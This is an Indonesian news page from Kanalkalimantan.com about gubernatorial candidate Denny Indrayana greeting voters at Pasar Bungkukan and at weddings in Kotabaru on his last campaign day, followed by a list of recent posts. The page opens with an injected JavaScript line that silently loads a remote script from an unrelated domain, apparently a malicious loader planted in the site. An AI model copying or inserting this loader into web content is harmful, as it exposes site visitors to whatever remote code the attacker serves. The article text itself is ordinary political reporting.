(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Pilgub Kalsel

Kampanye Terakhir di Kotabaru, Haji Denny Sapa Warga di Pasar Bungkukan


KANALKALIMANTAN.COM, BANJARBARU – Mengakhiri jadwal kampanye di Kabupaten Kotabaru, calon gubernur nomor 2 Denny Indrayana tak berhenti menyapa warga. Ia menyempatkan diri bertemu masyarakat di Pasar Bungkukan, Kecamatan Kelumpang Barat, serta menghadiri sejumlah acara pernikahan yang digelar warga setempat, Minggu (15/11/2020).

Pada kesempatan itu, Wamenkum HAM era Presiden Ke-6 RI Susilo Bambang Yudhoyono (SBY) ini memperkenalkan sebagai calon gubernur asal Stagen, Pulau Laut. Sebagai putra daerah, ia menegaskan akan bersama-sama pemerintah setempat membangun tanah kelahirannya lebih maju dan sejahtera.

“Kita mulai dari tanggal 9 Desember nanti dengan memilih Denny-Difri nomor 2,” tegasnya.

Ia mengatakan, jika kelak terpilih sebagai Gubernur, tokoh anti korupsi ini mengatakan akan mendorong pertumbuhan ekonomi Kalsel–khususnya Kotabaru, lebih maju lagi. Terutama mendorong perekonomian rakyat melalui berbagai program pemberdayaan.

 

“Kita akan membuat usaha bapak ibu lebih mudah dan nyaman. Ekonomi rakyat harus dikembangkan, pasar tradisional mesti lebih bagus dan rapi, demikian juga para nelayan, petani, serta pelaku UMKM harus lebih baik lagi,” katanya.

Semua itu akan terwujud, kata Haji Denny– panggilan Denny Indrayana, jika bisa menghadirkan kepemimpinan yang adil dan amanah. Sebab jika pemimpin dipilih hanya berdasar bagi-bagi uang, maka ke depan yang dipikir hanya upaya untuk mengembalikan modal.

Usai sosialisasi ke pasar, Haji Denny melanjutkan menghadiri pernikahan di desa Bangkalan Melayu dan di Banua Lawas, Kelumpang Hulu.

Pada kesempatan itu, penasihat hukum Prabowo-Sandi di Pilpres 2019 tersebut mendapat curhatan masyarakat terkait kondisi infrastruktur jalan dan jembatan yang perlu perhatian.

“Kiranya jika terpilih nanti, Haji Denny bisa membantu mewujudkan perbaikannya karena sudah lama tak ada perhatian,” kata Heri seraya mengatakan sekitar 2.600 warga di Desa Bangkalan Melayu akan siap memenangkannya di Pilgub mendatang.

Usai kampanye di Kotabaru, Haji Denny melanjutkan safari politiknya di Kabupaten Tanah Bumbu. Berbagai kegiatan memanti kandidat yang memiliki tagline hijrah gasan Banua ini. (Kanalkalimantan.com/ril)

Reporter : Ril
Editor : Cell

Al Ghifari

Recent Posts

PPK Landasan Ulin Tuntaskan Rekapitulasi, Ini 9 Caleg Peraih Suara Terbanyak di Dapil 4

KANALKALIMANTAN.COM, BANJARBARU - Proses perhitungan suara Daerah Pemilihan (Dapil) 4 Landasan Ulin resmi menutup jalannya… Read More

24 detik ago

Jasad Pemancing di Pengaron yang Tenggelam Akhirnya Ditemukan

KANALKALIMANTAN.COM, MARTAPURA - Jasad Irwansyah (37) warga Desa Lok Tunggul Kecamatan Pengaron, Kabupaten Banjar, yang… Read More

1 jam ago

Siring Sungai Basung di Cempaka Ambruk, Dua Dapur Rumah Warga Rusak

KANALKALIMANTAN.COM, BANJARBARU - Siring beton Sungai Basung di RT 1 RW 1 Kelurahan Sungai Tiung… Read More

3 jam ago

Bertemu KKG PJOK, Ini Kata Pj Bupati Erlin Hardi

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menghadiri pertemuan Kelompok Kerja Guru… Read More

3 jam ago

Forum Konsultasi Publik Penyusunan RKPD, Ini Kata Sekda HSU

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) HSU Adi Lesmana menilai pentingnya menghimpun aspirasi masyarakat terhadap… Read More

6 jam ago

Akibat Aktivitas Patahan Meratus, Tapin Kembali Rasakan Gempa Magnitudo 2.9

KANALKALIMANTAN.COM, BANJARMASIN - Gempa tektonik berskala kecil kembali mengguncang wilayah Provinsi Kalimantan Selatan (Kalsel). Gempa… Read More

9 jam ago

This website uses cookies.